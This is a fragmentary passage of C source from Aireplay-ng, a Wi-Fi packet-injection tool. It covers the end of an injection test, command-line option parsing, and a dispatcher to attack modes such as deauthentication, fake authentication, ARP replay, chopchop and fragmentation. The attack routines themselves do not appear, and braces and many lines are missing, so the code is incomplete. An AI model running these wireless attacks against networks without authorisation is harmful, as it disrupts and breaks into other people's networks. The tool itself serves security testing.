while (1) //waiting for relayed packet
caplen = read_packet(packet, sizeof(packet), &ri);
if ( filter_packet(packet, caplen) == 0 ) //got same length and same type
if(i == 0) //attack -0
if( h80211[0] == packet[0] )
else if(i==1) //attack -1 (open)
if( h80211[0] == packet[0] )
else if(i==2) //attack -1 (psk)
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
else if(i==3) //attack -2/-3/-4/-6
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
else if(i==4) //attack -5/-7
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
if( (packet[1] & 0x04) && memcmp( h80211+22, packet+22, 2 ) == 0 )
gettimeofday( &tv2, NULL );
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3*atime*1000)) //wait 3*'atime' ms for an answer
if(i==0) //attack -0
PCT; printf("Attack -0: OK\n");
else if(i==1) //attack -1 (open)
PCT; printf("Attack -1 (open): OK\n");
else if(i==2) //attack -1 (psk)
PCT; printf("Attack -1 (psk): OK\n");
else if(i==3) //attack -3
PCT; printf("Attack -2/-3/-4/-6: OK\n");
else if(i==4) //attack -5
PCT; printf("Attack -5/-7: OK\n");
if(i==0) //attack -0
PCT; printf("Attack -0: Failed\n");
else if(i==1) //attack -1 (open)
PCT; printf("Attack -1 (open): Failed\n");
else if(i==2) //attack -1 (psk)
PCT; printf("Attack -1 (psk): Failed\n");
else if(i==3) //attack -3
PCT; printf("Attack -2/-3/-4/-6: Failed\n");
else if(i==4) //attack -5
PCT; printf("Attack -5/-7: Failed\n");
if(!gotit && answers)
PCT; printf("Injection is working!\n");
if(opt.fast) return 0;
int main( int argc, char *argv[] )
/* check the arguments */
memset( &opt, 0, sizeof( opt ) );
memset( &dev, 0, sizeof( dev ) );
opt.f_type = -1; opt.f_subtype = -1;
opt.f_minlen = -1; opt.f_maxlen = -1;
opt.f_tods = -1; opt.f_fromds = -1;
opt.f_iswep = -1; opt.ringbuffer = 8;
opt.a_mode = -1; opt.r_fctrl = -1;
opt.delay = 15; opt.bittest = 0;
opt.fast = 0; opt.r_smac_set = 0;
opt.npackets = 1; opt.nodetect = 0;
opt.rtc = 1; opt.f_retry = 0;
#if defined(__FreeBSD__)
check what is our FreeBSD version. injection works
only on 7-CURRENT so abort if it's a lower version.
if( __FreeBSD_version < 700000 )
fprintf( stderr, "Aireplay-ng does not work on this "
"release of FreeBSD.\n" );
int option_index = 0;
static struct option long_options[] = {
{"deauth", 1, 0, '0'},
{"fakeauth", 1, 0, '1'},
{"interactive", 0, 0, '2'},
{"arpreplay", 0, 0, '3'},
{"chopchop", 0, 0, '4'},
{"fragment", 0, 0, '5'},
{"caffe-latte", 0, 0, '6'},
{"cfrag", 0, 0, '7'},
{"test", 0, 0, '9'},
{"help", 0, 0, 'H'},
{"fast", 0, 0, 'F'},
{"bittest", 0, 0, 'B'},
int option = getopt_long( argc, argv,
"b:d:s:m:n:u:v:t:T:f:g:w:x:p:a:c:h:e:ji:r:k:l:y:o:q:0:1:2345679HFBDR",
long_options, &option_index );
if( option < 0 ) break;
printf("\"%s --help\" for help.\n", argv[0]);
printf("\"%s --help\" for help.\n", argv[0]);
if( getmac( optarg, 1 ,opt.f_bssid ) != 0 )
printf( "Invalid BSSID (AP MAC address).\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( getmac( optarg, 1, opt.f_dmac ) != 0 )
printf( "Invalid destination MAC address.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( getmac( optarg, 1, opt.f_smac ) != 0 )
printf( "Invalid source MAC address.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_minlen );
if( opt.f_minlen < 0 || ret != 1 )
printf( "Invalid minimum length filter. [>=0]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_maxlen );
if( opt.f_maxlen < 0 || ret != 1 )
printf( "Invalid maximum length filter. [>=0]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_type );
if( opt.f_type < 0 || opt.f_type > 3 || ret != 1 )
printf( "Invalid type filter. [0-3]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_subtype );
if( opt.f_subtype < 0 || opt.f_subtype > 15 || ret != 1 )
printf( "Invalid subtype filter. [0-15]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf(optarg, "%d", &opt.f_retry);
if ((opt.f_retry < 1) || (opt.f_retry > 65535) || (ret != 1)) {
printf("Invalid retry setting. [1-65535]\n");
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_tods );
if(( opt.f_tods != 0 && opt.f_tods != 1 ) || ret != 1 )
printf( "Invalid tods filter. [0,1]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_fromds );
if(( opt.f_fromds != 0 && opt.f_fromds != 1 ) || ret != 1 )
printf( "Invalid fromds filter. [0,1]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.f_iswep );
if(( opt.f_iswep != 0 && opt.f_iswep != 1 ) || ret != 1 )
printf( "Invalid wep filter. [0,1]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.r_nbpps );
if( opt.r_nbpps < 1 || opt.r_nbpps > 1024 || ret != 1 )
printf( "Invalid number of packets per second. [1-1024]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.npackets );
if( opt.npackets < 0 || opt.npackets > 512 || ret != 1 )
printf( "Invalid number of packets per burst. [0-512]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.delay );
if( opt.delay < 1 || opt.delay > 600 || ret != 1 )
printf( "Invalid number of seconds. [1-600]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%x", &opt.r_fctrl );
if( opt.r_fctrl < 0 || opt.r_fctrl > 65535 || ret != 1 )
printf( "Invalid frame control word. [0-65535]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( getmac( optarg, 1, opt.r_bssid ) != 0 )
printf( "Invalid AP MAC address.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( getmac( optarg, 1, opt.r_dmac ) != 0 )
printf( "Invalid destination MAC address.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
ret = sscanf( optarg, "%d", &opt.ringbuffer );
if( opt.ringbuffer < 1 || ret != 1 )
printf( "Invalid replay ring buffer size. [>=1]\n");
printf("\"%s --help\" for help.\n", argv[0]);
if( getmac( optarg, 1, opt.r_smac ) != 0 )
printf( "Invalid source MAC address.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
memset( opt.r_essid, 0, sizeof( opt.r_essid ) );
strncpy( opt.r_essid, optarg, sizeof( opt.r_essid ) - 1 );
opt.r_fromdsinj = 1;
inet_aton( optarg, (struct in_addr *) opt.r_dip );
inet_aton( optarg, (struct in_addr *) opt.r_sip );
if( opt.prga != NULL )
printf( "PRGA file already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( read_prga(&(opt.prga), optarg) != 0 )
if( opt.s_face != NULL || opt.s_file )
printf( "Packet source already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
opt.s_face = optarg;
opt.port_in = get_ip_port(opt.s_face, opt.ip_in, sizeof(opt.ip_in)-1);
if( opt.s_face != NULL || opt.s_file )
printf( "Packet source already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
opt.s_file = optarg;
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
for (i=0; optarg[i] != 0; i++)
if (isdigit((int)optarg[i]) == 0)
ret = sscanf( optarg, "%d", &opt.a_count );
if( opt.a_count < 0 || optarg[i] != 0 || ret != 1)
printf( "Invalid deauthentication count or missing value. [>=0]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
for (i=0; optarg[i] != 0; i++)
if (isdigit((int)optarg[i]) == 0)
ret = sscanf( optarg, "%d", &opt.a_delay );
if( opt.a_delay < 0 || optarg[i] != 0 || ret != 1)
printf( "Invalid reauthentication delay or missing value. [>=0]\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode != -1 )
printf( "Attack mode already specified.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
printf( usage, getVersion("Aireplay-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC) );
default : goto usage;
if( argc - optind != 1 )
printf( usage, getVersion("Aireplay-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC) );
if( argc - optind == 0)
printf("No replay interface specified.\n");
printf("\"%s --help\" for help.\n", argv[0]);
if( opt.a_mode == -1 )
printf( "Please specify an attack mode.\n" );
printf("\"%s --help\" for help.\n", argv[0]);
if( (opt.f_minlen > 0 && opt.f_maxlen > 0) && opt.f_minlen > opt.f_maxlen )
printf( "Invalid length filter (min(-m):%d > max(-n):%d).\n",
opt.f_minlen, opt.f_maxlen );
printf("\"%s --help\" for help.\n", argv[0]);
if ( opt.f_tods == 1 && opt.f_fromds == 1 )
printf( "FromDS and ToDS bit are set: packet has to come from the AP and go to the AP\n" );
/* open the RTC device if necessary */
#if defined(__i386__)
if( opt.a_mode > 1 )
if( ( dev.fd_rtc = open( "/dev/rtc0", O_RDONLY ) ) < 0 )
if( (dev.fd_rtc == 0) && ( ( dev.fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 ) )
if( ioctl( dev.fd_rtc, RTC_IRQP_SET, RTC_RESOLUTION ) < 0 )
perror( "ioctl(RTC_IRQP_SET) failed" );
"Make sure enhanced rtc device support is enabled in the kernel (module\n"
"rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.\n" );
close( dev.fd_rtc );
if( ioctl( dev.fd_rtc, RTC_PIE_ON, 0 ) < 0 )
perror( "ioctl(RTC_PIE_ON) failed" );
close( dev.fd_rtc );
printf( "For information, no action required:"
" Using gettimeofday() instead of /dev/rtc\n" );
opt.iface_out = argv[optind];
opt.port_out = get_ip_port(opt.iface_out, opt.ip_out, sizeof(opt.ip_out)-1);
//don't open interface(s) when using test mode and airserv
if( ! (opt.a_mode == 9 && opt.port_out >= 0 ) )
/* open the replay interface */
_wi_out = wi_open(opt.iface_out);
dev.fd_out = wi_fd(_wi_out);
/* open the packet source */
if( opt.s_face != NULL )
//don't open interface(s) when using test mode and airserv
if( ! (opt.a_mode == 9 && opt.port_in >= 0 ) )
_wi_in = wi_open(opt.s_face);
dev.fd_in = wi_fd(_wi_in);
wi_get_mac(_wi_in, dev.mac_in);
dev.fd_in = dev.fd_out;
dev.arptype_in = dev.arptype_out;
wi_get_mac(_wi_in, dev.mac_in);
wi_get_mac(_wi_out, dev.mac_out);
/* drop privileges */
if( opt.r_nbpps == 0 )
if( dev.is_wlanng || dev.is_hostap )
if( opt.s_file != NULL )
if( ! ( dev.f_cap_in = fopen( opt.s_file, "rb" ) ) )
perror( "open failed" );
n = sizeof( struct pcap_file_header );
if( fread( &dev.pfh_in, 1, n, dev.f_cap_in ) != (size_t) n )
perror( "fread(pcap file header) failed" );
if( dev.pfh_in.magic != TCPDUMP_MAGIC &&
dev.pfh_in.magic != TCPDUMP_CIGAM )
fprintf( stderr, "\"%s\" isn't a pcap file (expected "
"TCPDUMP_MAGIC).\n", opt.s_file );
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
SWAP32(dev.pfh_in.linktype);
if( dev.pfh_in.linktype != LINKTYPE_IEEE802_11 &&
dev.pfh_in.linktype != LINKTYPE_PRISM_HEADER &&
dev.pfh_in.linktype != LINKTYPE_RADIOTAP_HDR &&
dev.pfh_in.linktype != LINKTYPE_PPI_HDR )
fprintf( stderr, "Wrong linktype from pcap file header "
"(expected LINKTYPE_IEEE802_11) -\n"
"this doesn't look like a regular 802.11 "
//if there is no -h given, use default hardware mac
if( maccmp( opt.r_smac, NULL_MAC) == 0 )
memcpy( opt.r_smac, dev.mac_out, 6);
if(opt.a_mode != 0 && opt.a_mode != 4 && opt.a_mode != 9)
printf("No source MAC (-h) specified. Using the device MAC (%02X:%02X:%02X:%02X:%02X:%02X)\n",
dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5]);
if( maccmp( opt.r_smac, dev.mac_out) != 0 && maccmp( opt.r_smac, NULL_MAC) != 0)
// if( dev.is_madwifi && opt.a_mode == 5 ) printf("For --fragment to work on madwifi[-ng], set the interface MAC according to (-h)!\n");
fprintf( stderr, "The interface MAC (%02X:%02X:%02X:%02X:%02X:%02X)"
" doesn't match the specified MAC (-h).\n"
"\tifconfig %s hw ether %02X:%02X:%02X:%02X:%02X:%02X\n",
dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5],
opt.iface_out, opt.r_smac[0], opt.r_smac[1], opt.r_smac[2], opt.r_smac[3], opt.r_smac[4], opt.r_smac[5] );
switch( opt.a_mode )
case 0 : return( do_attack_deauth() );
case 1 : return( do_attack_fake_auth() );
case 2 : return( do_attack_interactive() );
case 3 : return( do_attack_arp_resend() );
case 4 : return( do_attack_chopchop() );
case 5 : return( do_attack_fragment() );
case 6 : return( do_attack_caffe_latte() );
case 7 : return( do_attack_cfrag() );
case 9 : return( do_attack_test() );
/* that's all, folks */